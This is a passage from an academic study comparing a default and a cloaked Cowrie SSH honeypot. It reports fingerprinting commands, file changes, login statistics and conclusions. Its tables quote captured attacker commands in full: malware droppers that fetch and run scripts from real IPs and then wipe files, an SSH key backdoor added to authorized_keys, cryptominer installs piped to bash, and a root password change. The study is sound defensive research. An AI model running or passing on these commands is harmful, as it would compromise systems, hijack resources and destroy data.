The firewall was configured in AWS to allow any traffic on IPv4 TCP port 22 to the Cowrie honeypots and traffic from the honeypots to Splunk on TCP port 5140. The unmodified honeypot had an internet address in the 18.119.0.0/16 subnet, and the cloaked honeypot had an internet address in the 13.58.0.0/16 subnet. The primary goal of the project is to determine whether creating a cloaked Cowrie machine by modifying the default uncloaked Cowrie machine results in an increase in malicious traffic or resistance to fingerprinting. The Cowrie-Unmodified machine is a default Cowrie installation, the honeypot was left unmodified from the default configuration, which is listed in the Cowrie GitHub project, and the password authentication was set to auth random. Auth random is a configuration in Cowrie to allow the attackers into the shell after making a certain number of guesses, no matter what the password is, and then the password is saved for that IP address, and login will only be accepted with that password from the same source IP address. The cloaked Cowrie server also used auth random. To create the cloaked Cowrie server, we had to research the commands that attackers would use to fingerprint the system and determine whether or not it was a honeypot. The following commands, which were not available on the default Cowrie system, were used to fingerprint the uncloaked honeypot during our pre-research phase: The following table shows the files the attackers interacted with on the uncloaked honeypot:
764
C. Hetzler et al. Table 1. Commands run on the uncloaked system which failed
Command run
Action taken
lspci | grep irti
Added lspci to cloaked honeypot
dmesg | grep irtual
Added dmesg to cloaked honeypot
dmidecode|grep Vendor|head -n 1
Added dmidecode to cloaked honeypot
/ip cloud print
This is a Windows command, so no action was taken
command -v curl
Added command to cloaked honeypot
lspci | grep -i --color ‘vga\|3d\|2d’;
Added lspci to cloaked honeypot
Table 2. Files attackers interacted with on uncloaked honeypot File path
Action taken
/proc/cpuinfo
Changed file contents on cloaked honeypot
/dev/ttyGSM*, /dev/ttyUSB-mod*, /var/spool/sms/*, /var/log/smsd.log, /etc./smsd.conf*, /usr/bin/qmuxd, /var/qmux_connect_socket, /etc./config/simman, /dev/modem*, /var/config/sms/*
None of these files were added because they appear to target cell modems, which was not a malware type we were interested in collecting for this project
/tmp
No action, directory already existed
/var/run
No action, directory already existed
/mnt
No action, directory already existed
/root
No action, directory already existed
/proc/1
No action, file already existed
/var/run/gcc.pid
No action, file is created when program is run
After collecting these commands and studying the files the attackers interacted with on the uncloaked honeypot, we were able to create the cloaked honeypot. The CowrieCloaked machine has a few Linux commands that the uncloaked does not and has many edited commands that return unique metrics, as shown in the following Table 3: Another method of cloaking the honeypot is to remove the default user account and directory of phil, this user exists on all cowrie honeypots at default, so it is an excellent way for attackers to identify a honeypot. Other files that were changed are shown in the following Table 4: The changes discussed above were made to the cloaked machine, which stands out as an ideal target for attackers because it is expected they will not easily identify the machine as a honeypot, allowing for a better collection of malware and more malicious traffic.
Analysis of SSH Honeypot Effectiveness
765
Table 3. Commands changed on cloaked system Command name
Type of change
lspci
Added to cowrie
dmesg
Added to cowrie
dmidecode
Added to cowrie
command
Added to cowrie
uname
Edited return value
free
Edited return value
ifconfig
Edited return value
Table 4. Files changed on cloaked system File path
Action taken
/home/phil
Directory deleted
/etc./hostname
Changed
/etc./passwd
Changed
/etc./group
Changed
/etc./shadow
Changed
/etc./issue
Changed
/etc./motd
File deleted
/proc/cpuinfo
Changed
/proc/uptime
Changed
/proc/mounts
Changed
/proc/meminfo
Changed
/proc/version
Changed
/proc/net/apr
Changed
/share/cowrie/txtcmds/bin/dmesg
File created
/share/cowrie/txtcmds/bin/lspci
File created
/share/cowrie/txtcmds/bin/dmidecode
File created
4 Data and Results The data collected for the project occurred between April 5, 2022, and April 18, 2022. It shows a significant volume of login attempts and commands executed to the cloaked machine, compared with the fewer logins and commands on the uncloaked machine. The cloaked honeypot also received a large amount of traffic from a few specific IP addresses.
766
C. Hetzler et al.
In contrast, the uncloaked honeypot received a more diverse and spread volume of traffic, which is attributed to more interest in the cloaked honeypot increasing the malicious campaigns of a few specific actors. This study discovered that attackers were interested in both the cloaked and uncloaked SSH servers; however, the attackers displayed more interesting behavior and deposited more active malware on the cloaked server. The data in Appendix A (Tables 14 and 15) show that attackers appear to repeatedly enter the same command on the target SSH servers, which is most likely the result of scripted malicious actors rather than real people attacking the servers. The following section covers data collected from the honeypots, which provides insight into attacker tactics, and the comparison between the cloaked and uncloaked honeypots begins in Sect. 4.1. The chart below depicts the breakdown of attacker source IP addresses targeting both cloaked and uncloaked machines:
Fig. 2. Source IP addresses connecting to cowrie
Figure 2 shows the large volume of attacks launched from the subnet 5.188.62.193249, indicating that the attack planning and execution originated from a single network source. The following sections divide the source IP addresses into cloaked and uncloaked machines. Figure 3 depicts the top attempted usernames for both systems: Figure 3 shows that attackers prefer authentication accounts that are likely to have elevated privileges on the system because they want to run commands without restriction and have full access to the filesystem. A large section of the commands the attackers would run to fingerprint the systems required elevated privileges are listed in Table 5. Table 5 shows that attackers are only interested in executing malware with accounts that have root privileges, otherwise, the malware will not download onto the system. In order to better understand the data, the cloaked and uncloaked system’s data are analyzed in the following sections. 4.1 Uncloaked Data Between April 5, 2022, and April 18, 2022, the uncloaked cowrie honeypot received 828 command executions, and 4,696 total login attempts, with 829 successful and 3,867 failed login attempts.
Analysis of SSH Honeypot Effectiveness
767
Fig. 3. Attempted usernames; Admin 80.3%, 123456 3.6%, Root 1.9%, Test 1.7%, Romano 1.7%, Ubuntu 1.1%, Password 0.8%, Other (12) 8.9% Table 5. Commands executed on honeypot systems Command run
Count Percent
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/oni 132 on002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
15.94
cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitam a.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
11
1.33
#!/bin/sh; PATH=$PATH :/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://182.52. 51.239/scripts/23s; curl -O http://182.52.51.239/scripts/23s; chmod +x 23s;./23s; wget http://182.52.51.239/scripts/23; curl -O http://182.52.51.239/ scripts/23; chmod +x 23;./23; rm -rf 23.sh;
7
0.88
Table 6. Uncloaked login attempts 82.3% and 17.7%, respectively Login result
Percentage
Succeeded
17.7
Failed
82.3
768
C. Hetzler et al.
Table 6 shows that significantly more login attempts were made than were successful. This is most likely the result of an attacker’s strategy for identifying honeypot servers; once they find a username/password pair that works, they will logout and try another password for the same username to see if they are still allowed in. As more attackers fingerprint the server, they will create more failed login attempts than successful attempts. Figure 4 depicts the attack sources for the uncloaked server, which include a wide range of subnets.
Fig. 4. Source IP addresses
The data shows that the attackers were dispersed across many different IP addresses and subnets, and there is a high degree of diversity among all IP addresses. This is most likely due to a large number of independent attackers connecting to the machine, conducting fingerprinting, and discovering the machine is likely a honeypot and then disconnecting. Many different malware distribution bots use the same tactic of connecting and fingerprinting, which explains the variety of IP sources of attacks. The data collected from the uncloaked machine shows a significant majority of login attempts failed and no clear majority subnet sources for the malicious SSH traffic. The following section covers the data collected from the cloaked fingerprint-resistant honeypot. 4.2 Cloaked Data Between April 5, 2022, and April 18, 2022, the cloaked cowrie honeypot received 932 command executions, and 13,691 total login attempts, with 9,977 successful and 3,714 failed login attempts. Table 7 shows the ratio of successful to failed login attempts: Table 7. Cloaked login attempts 72.9% and 27.1%, respectively Login result
Percentage
Succeeded
72.9
Failed
27.1
Analysis of SSH Honeypot Effectiveness
769
The data shows the attackers succeeded in more of their logins than failed. This is likely because the initial fingerprinting usually led the attackers to believe the system was genuine and not a honeypot. Hence, they progressed to further stages of the infection and created more logins. The attack sources, which launched against the cloaked system were vastly different from those on the uncloaked, as shown in the Fig. 5 below:
Fig. 5. Cloaked login attempt source IP
The data shows a large volume of attack traffic sourcing from the 5.188.62.0/24 subnet, which was not seen in the uncloaked machine. The likely cause of the change in attack source is that the initial fingerprinting of the cloaked machine deceived the attackers and convinced them to proceed with the next stage of their attack, which may have been hosted in the above subnet. Whereas it is suspected in the uncloaked machine, the attackers easily and early detected the machine was a honeypot and moved on to another target. Further research is required to determine the root cause of the observed change in source IP addresses. The data collected from the cloaked honeypot show that a significant majority of login attempts were successful, as well as a clear majority of IP address sources conducting the attacking, which is expected to be the result of improved fingerprint-resistance in the cloaked honeypot and increased interest from attackers. The following section discusses how the data collected from uncloaked and cloaked honeypots differs and concludes on the reasons for the differences.
5 Comparison The main difference between the cloaked and uncloaked honeypots is their filesystems. The cloaked has extra commands added, as shown in Table 3, and extra configuration files added, as shown in Table 4. These modifications separate the cloaked honeypot system from the currently available Cowrie honeypot on GitHub and allow it to resist fingerprinting better. The cloaked honeypot got significantly more attacker traffic than
770
C. Hetzler et al. Table 8. Ratio of login attempts by destination 25.5% and 74.5%, respectively Honeypot machine
Percentage
Cloaked
74.5
Uncloaked
25.5
the uncloaked, with the number of login attempts being: 13,691 and 4,696, respectively during the April 5, 2022, and April 18, 2022, period: Table 8 shows that cloaking was very effective at producing more login attempts, which is suspected that the attackers think they found a legitimate server rather than something to avoid. The reason for this is that almost all of the attackers, when they first connect will fingerprint the system, for example, by running uname or looking into the /proc/ directory. When the attacker realizes the system is a default cowrie honeypot, they will take note of it, log out, and typically not execute malware and usually not return to the machine. The total number of commands entered into the uncloaked honeypot was 828, while the cloaked received 932 commands. Table 9 shows the comparison of commands executed between the two honeypots: Table 9. Ratio of commands executed on the systems, cloaked 53.0%, uncloaked 47.0% Honeypot machine
Percentage
Cloaked
53
Uncloaked
47
Table 9 shows that the cloaked machine received the majority of the commands out of the two, suggesting attackers were more interested in the cloaked machine while less interested in the uncloaked. However, uncloaked system received a higher number of commands as a ratio of login attempts, despite receiving around 100 fewer commands than the cloaked system, implying that attackers ran more commands per login on the uncloaked machine than on the cloaked machine. The possible reason is that attackers run extensive fingerprinting on the uncloaked system while running less extensive fingerprinting on the cloaked machine and quickly downloading the malware instead. Another possible reason for the uncloaked to receive more commands as a ratio of login attempts could be the result of attackers poisoning our data by running extra commands once they determined the uncloaked server was a research honeypot. The cloaked honeypot contains five malware one-line dropper commands in the top 20 executed commands, as shown in Table 11, while the uncloaked honeypot only contains four, as shown in Table 10. The percentage of malware droppers executed on the uncloaked as a percentage of the total top 20 commands is 32.7%, whereas the cloaked machine achieved 21.4%. Even though the cloaked honeypot received slightly fewer malware commands than the uncloaked, the difference is not significant enough to rule out outliers in the data, so it is still asserted, given all of the other evidence, that the cloaked honeypot was more
Analysis of SSH Honeypot Effectiveness
771
fingerprint-resistant and increased the malicious traffic to the honeypot. This discovery is another reason why more research is needed to validate the claim that fingerprint-resistant honeypots increase attacker traffic compared to standard honeypots. Table 10. Uncloaked honeypot malware dropper commands 32.7% of Top 20 commands executed Command executed
Count
cd /tmp || cd /var/run || cd /mnt || cd 132 /root || cd /; wget http://45.90.160. 54/onion002; curl -O http://45.90. 160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf * cd ~ && rm -rf.ssh && mkdir.ssh && echo “ssh-rsa AAAAB 3NzaC1yc2EAAAABJQAAAQEA rDp4cun2lhr4KUhBGE 7VvAcwdli2a8dbnrTOrbMz1+ 5O73fcBOx8NVbUT0bUanUV9 tJ2/9p7+vD0EpZ3Tz/+ 0kX34uAx1RV/75GVOmNx+ 9EuWOnvNoaJe0QXxziIg9eLBH pgLMuakb5+BgTFB+rKJA w9u9FSTDengvS8hX1kNFS 4Mjux0hJOK8rvcEmPecjdySYM b66nylAKGwCEE6WEQH md1mUPgHwGQ0 hWCwsQk13yCGPK 5w6hYp5zYkFnvlC8hGmd4Ww+ u97k6pfTGTU bJk14ujvcD9iUKQTTWYY jIIu5PmUux5bsZ0R4WFwdIe6+ i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go = ~/.ssh && cd ~
25
Percentage of total commands 15.942029
3.019324
(continued)
772
C. Hetzler et al. Table 10. (continued)
Command executed
Count
Percentage of total commands
wget http://45.90.161.105/systemd && chmod + x * &&./systemd -o de.minexmr.com:443 -B -u 8BHQU unQHax1XjPonUxPKk1H4EKP 6SdXnMtyyY5W9Bts7qM7uq 5XsjjXiPj1zacMGP 8chCv4cumYZRYfH5cUBG shKy1gssW -k --tls --rig-id Main
17
2.05314
cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Sai tama.sh; curl -O http://136.144.41. 55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
11
1.328502
Table 11. Cloaked honeypot malware dropper commands 21.4% of Top 20 commands executed Command executed
Count
cd /tmp || cd /var/run || cd /mnt || cd /root 47 || cd /; wget http://45.90.160.54/oni on002; curl -O http://45.90.160.54/oni on002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
Percentage of total commands 5.042918
(continued)
Analysis of SSH Honeypot Effectiveness
773
Table 11. (continued) Command executed
Count
Percentage of total commands
cd ~ && rm -rf.ssh && mkdir.ssh && 33 echo “ssh-rsa AAAAB 3NzaC1yc2EAAAABJQAAAQEA rDp4cun2lhr4KUhBGE 7VvAcwdli2a8dbnrTOrbMz1+ 5O73fcBOx8NVbUT0bUanUV9 tJ2/9p7+vD0EpZ3Tz/+ 0kX34uAx1RV/75GVOmNx+ 9EuWOnvNoaJe0QXxziIg9eLBH pgLMuakb5+BgTFB+rKJAw9u9FSTD engvS8hX1kNFS4Mjux0hJOK 8rvcEmPecjdySYMb66nylAKGwCEE 6WEQHmd1mUPgHwGQ0 hWCwsQk13yCGPK 5w6hYp5zYkFnvlC8hGmd4Ww+ u97k6pfTGTU bJk14ujvcD9iUKQTTWYY jIIu5PmUux5bsZ0R4WFwdIe6+ i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go = ~/.ssh && cd ~
3.540773
wget http://45.90.161.105/systemd && 20 chmod + x * &&./systemd -o de.minexmr.com:443 -B -u 8BHQU unQHax1XjPonUxPKk1H4EKP 6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP 8chCv4cumYZRYfH5cUBG shKy1gssW -k --tls --rig-id Main
2.145923
cd /tmp cd /var/run cd /mnt cd /root cd 17 /; wget http://136.144.41.55/Saitam a.sh; curl -O http://136.144.41.55/Sai tama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
1.824034
(continued)
774
C. Hetzler et al. Table 11. (continued)
Command executed
Count
curl -s -L https://raw.githubusercontent. 12 com/C3Pool/xmrig_setup/master/ setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF 7ehqRsSfbvZM2Pz 7bDeaZXVQA s533a7MUnhB6pUREVD j2LgWj1AQSGo2HRj; wget https:// raw.githubusercontent.com/C3Pool/ xmrig_setup/master/setup_c3pool_min er.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF 7ehqRsSfbvZM2Pz 7bDeaZXVQA s533a7MUnhB6pUREVD j2LgWj1AQSGo2HRj; echo -e “xox0\nxox0” | passwd
Percentage of total commands 1.287554
While the cloaked system, as shown in Table 13, contains 14 fingerprint commands or 76% of the top 20 commands, and the uncloaked shown in Table 12, contains 15 fingerprint commands or 64.8% of the top 20 commands executed. These findings support our hypothesis and are consistent with our previous findings that the cloaked SSH honeypot received more attacker traffic than the uncloaked honeypot. As previously stated, the difference between the number of commands executed on the cloaked versus uncloaked is fairly close but the cloaked received more commands overall, as was expected in our hypothesis as a result of the fingerprint-resistance incorporated into the cloaked honeypot. However, since the difference between the commands executed on the cloaked and uncloaked is not very large, it is suggested that more research be conducted to ensure the validity of the claim that cloaking a honeypot increases attacker traffic. The data shows that the cloaked honeypot received much more login attempts and a much more successful login ratio than the uncloaked one. However, the data is less conclusive on whether the cloaked machine received more commands than the uncloaked, even though the number of commands executed on the cloaked machine was 100 more than on the uncloaked. Since the number of commands is pretty close, future research is necessary to ensure the results are repeatable. Specifically, it would make the research argument much stronger if there was a more significant difference between the number of commands executed on the cloaked and uncloaked machines. The complete list of the top 20 executed commands can be found in Appendix A. Data collected on the cloaked and uncloaked machines show that the cloaked honeypot has more traffic and numbers, which supports our hypothesis.
Analysis of SSH Honeypot Effectiveness
775
Table 12. Uncloaked honeypot fingerprinting commands 64.8% of Top 20 commands executed Command executed
Count
Percentage of total commands
uname -a
43
5.193237
which ls
25
3.019324
w
25
3.019324
uname -m
25
3.019324
uname
25
3.019324
top
25
3.019324
lscpu | grep Model
25
3.019324
ls -lh $(which ls)
25
3.019324
free -m | grep Mem | awk ‘{print $2,$3, $4, $5, $6, $7}’
25
3.019324
crontab -l
25
3.019324
cat /proc/cpuinfo | grep name | wc -l
25
3.019324
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
25
3.019324
cat /proc/cpuinfo | grep model | grep name | wc -l
25
3.019324
uname -s -v -n -r -m
13
1.570048
cat /proc/cpuinfo
10
1.084599
Table 13. Cloaked honeypot fingerprinting commands 76% of Top 20 commands executed Command executed
Count
Percentage of total commands
uname -a
47
5.042918
top
34
3.648069
cat /proc/cpuinfo | grep name | wc -l
34
3.648069
which ls
33
3.540773
w
33
3.540773
uname -m
33
3.540773
uname
33
3.540773
lscpu | grep Model
33
3.540773
ls -lh $(which ls)
33
3.540773
free -m | grep Mem | awk ‘{print $2,$3, $4, $5, $6, $7}’
33
3.540773
crontab -l
33
3.540773
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
33
3.540773
cat /proc/cpuinfo | grep model | grep name | wc -l
33
3.540773
uname -s -v -n -r -m
12
1.287554
6 Conclusion Based on the data and analysis, this study concludes that a cloaked SSH honeypot is more successful in attracting the attacker’s attention than an uncloaked SSH honeypot. On the cloaked system, there were more commands, and login attempts overall, more
776
C. Hetzler et al.
successful logins, more malware installed on the cloaked system, and more target attacks from similar IP subnets on the cloaked machine. The uncloaked SSH honeypot was less effective, with more failed login attempts, fewer commands executed, less malware installed, and more diverse attacker source IPs. Nonetheless, there was a lot of interest, with nearly 5,000 uncloaked login attempts and nearly 14,000 cloaked login attempts in a 10-day period. Interestingly, both received roughly the same number of commands entered, despite the fact that the cloaked honeypot had significantly more login attempts, which was attributed to more fingerprinting commands run on the uncloaked machine. This leads to the conclusion that successfully cloaking the honeypot will make or break the ability to intercept malware and understand modern attacker tactics. It is critical to make the honeypot as credible as possible in order to obtain the best data possible. If the attackers are not persuaded, the data collected will be useless, most likely just fingerprinting commands with no impact on malware research. Having a cloaked and uncloaked server makes it evident that most attackers are experienced enough to tell the difference between a low-effort honeypot and a real machine. Even given the data collected supports our hypothesis, further research is suggested to be conducted to ensure a similar outcome to this research paper is found.
7 Future Work There are numerous variables to consider when investigating the effectiveness of various honeypot configurations. In this research paper, we added convincing config files, modified existing config files, and added commands which were not on the honeypot. However, this project did not study the impact of changes to more configurations and extra added files. It should be studied in future research, as this will provide greater insight into the configurations and files that have the most significant impact in creating a convincing honeypot. Specifically, adding convincing private business files to the honeypot would allow for analysis of attackers’ methods once they have discovered information, they think is confidential to the business. Stemming from the idea of attackers looking for specific targets, future research should also explore the impact of installing other servers onto the honeypot machines, such as web servers, databases, VPN servers, or cell modems, with the goal of discovering if any particular services installed in conjunction with the SSH honeypot increases the attacker interest. Another area of further research is analyzing the difference in attacks and methods between different subnets on the internet. For example, our research was conducted in subnets controlled by the AWS us-east2 region. Our research also was not controlled for the subnet the honeypots were located in, which future research should control for that variable. The unmodified honeypot had an internet address in the 18.119.0.0/16 subnet, and the cloaked honeypot had an internet address in the 13.58.0.0/16 subnet, which could have reduced the usefulness of our collected data. It would be beneficial to study the different types of attacks if the research was conducted on another subnet, University network, Government network, ISP network, etc. Future work should attempt to replicate the results of this research paper in order to validate the assertion that cloaked honeypots receive more traffic. Acknowledgment. This project was made possible due to the help of Dr. Khan, who provided valuable insight and advice throughout our project journey. We would not have been able to reach
Analysis of SSH Honeypot Effectiveness
777
the designated objective without his help. Thanks must also be given to GitHub user 411Hall for providing guidance on which aspects of the honeypot to cloak in order to effectively evade detection. It was essential for the validity of the research project.
Appendix A
Table 14. Cloaked server executed commands Command executed
Count
Percentage
uname -a
47
5.042918
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90. 160.54/onion002; curl -O http:// 45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
47
5.042918
top
34
3.648069
cat /proc/cpuinfo | grep name | wc 34 -l
3.648069
which ls
3.540773
33
w
33
3.540773
uname -m
33
3.540773
uname
33
3.540773
lscpu | grep Model
33
3.540773
ls -lh $(which ls)
33
3.540773
free -m | grep Mem | awk ‘{print $2,$3, $4, $5, $6, $7}’
33
3.540773
crontab -l
33
3.540773 (continued)
778
C. Hetzler et al. Table 14. (continued)
Command executed
Count
Percentage
cd ~ && rm -rf.ssh && mkdir.ssh 33 && echo “ssh-rsa AAAAB 3NzaC1yc2EAAAABJQAAAQEA rDp4cun2lhr4KUhBGE 7VvAcwdli2a8dbnrTOrbMz1+ 5O73fcBOx8NVbUT0bUanUV9 tJ2/9p7+vD0EpZ3Tz/+ 0kX34uAx1RV/75GVOmNx+ 9EuWOnvNoaJe0QXxziIg9eLBH pgLMuakb5+BgTFB+rKJA w9u9FSTDengvS8hX1kNFS 4Mjux0hJOK 8rvcEmPecjdySYMb66nylAKG wCEE6WEQH md1mUPgHwGQ0 hWCwsQk13yCGPK 5w6hYp5zYkFnvlC8hGmd4Ww+ u97k6pfTGTU bJk14ujvcD9iUKQTTWYY jIIu5PmUux5bsZ0R4WFwdIe6+ i6rBLAsPKgAySVKPRK+ oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go = ~/.ssh && cd ~
3.540773
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
33
3.540773
cat /proc/cpuinfo | grep model | grep name | wc -l
33
3.540773
wget http://45.90.161.105/sys 20 temd && chmod+x * &&./systemd -o de.minexmr.com:443 -B -u 8BHQU unQHax1XjPonUxPKk1H4EKP 6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP 8chCv4cumYZRYfH5cUBG shKy1gssW -k --tls --rig-id Main
2.145923
(continued)
Analysis of SSH Honeypot Effectiveness Table 14. (continued) Command executed
Count
Percentage
cd /tmp cd /var/run cd /mnt cd 17 /root cd /; wget http://136.144.41. 55/Saitama.sh; curl -O http://136. 144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
1.824034
Enter new UNIX password:
15
1.609442
uname -s -v -n -r -m
12
1.287554
curl -s -L https://raw.githubuse 12 rcontent.com/C3Pool/xmrig_ setup/master/setup_c3pool_min er.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF 7ehqRsSfbvZM2 Pz7bDeaZXVQA s533a7MUnhB6pUREVD j2LgWj1AQSGo2HRj; wget https://raw.githubusercontent. com/C3Pool/xmrig_setup/master/ setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF 7ehqRsSfbvZM2 Pz7bDeaZXVQA s533a7MUnhB6pUREVD j2LgWj1AQSGo2HRj; echo -e “xox0\nxox0” | passwd
1.287554
779
780
C. Hetzler et al. Table 15. Uncloaked Server Executed Commands
Command executed
Count
cd /tmp || cd /var/run || cd /mnt || cd /root || 132 cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
Percentage 15.942029
uname -a
43
which ls
25
5.193237 3.019324
w
25
3.019324
uname -m
25
3.019324
uname
25
3.019324
top
25
3.019324
lscpu | grep Model
25
3.019324
ls -lh $(which ls)
25
3.019324
free -m | grep Mem | awk ‘{print $2,$3, $4, $5, $6, $7}’
25
3.019324
crontab -l
25
3.019324
cd ~ && rm -rf.ssh && mkdir.ssh && echo “ssh-rsa AAAAB 3NzaC1yc2EAAAABJQAAAQEA rDp4cun2lhr4KUhBGE 7VvAcwdli2a8dbnrTOrbMz1+ 5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+ vD0EpZ3Tz/+0kX34uAx1RV/75GVO mNx+9EuWOnvNoaJe0QXxziIg9eLBH pgLMuakb5+BgTFB+rKJAw9u9FSTD engvS8hX1kNFS4Mjux0hJOK 8rvcEmPecjdySYMb66nylAKGwCEE 6WEQHmd1mUPgHwGQ0 hWCwsQk13yCGPK 5w6hYp5zYkFnvlC8hGmd4Ww + u97k6pfTGTU bJk14ujvcD9iUKQTTWYY jIIu5PmUux5bsZ0R4WFwdIe6+i6rBLA sPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go = ~ /.ssh && cd ~
25
3.019324
cat /proc/cpuinfo | grep name | wc -l
25
3.019324
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
25
3.019324
cat /proc/cpuinfo | grep model | grep name | wc -l
25
3.019324
(continued)
Analysis of SSH Honeypot Effectiveness
781
Table 15. (continued) Command executed
Count
Percentage
wget http://45.90.161.105/systemd && 17 chmod + x * &&./systemd -o de.minexmr.com:443 -B -u 8BHQU unQHax1XjPonUxPKk1H4EKP 6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP 8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
2.05314
Enter new UNIX password:
14
1.690821
uname -s -v -n -r -m
13
1.570048
cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
11
1.328502
cat /proc/cpuinfo
10
1.084599
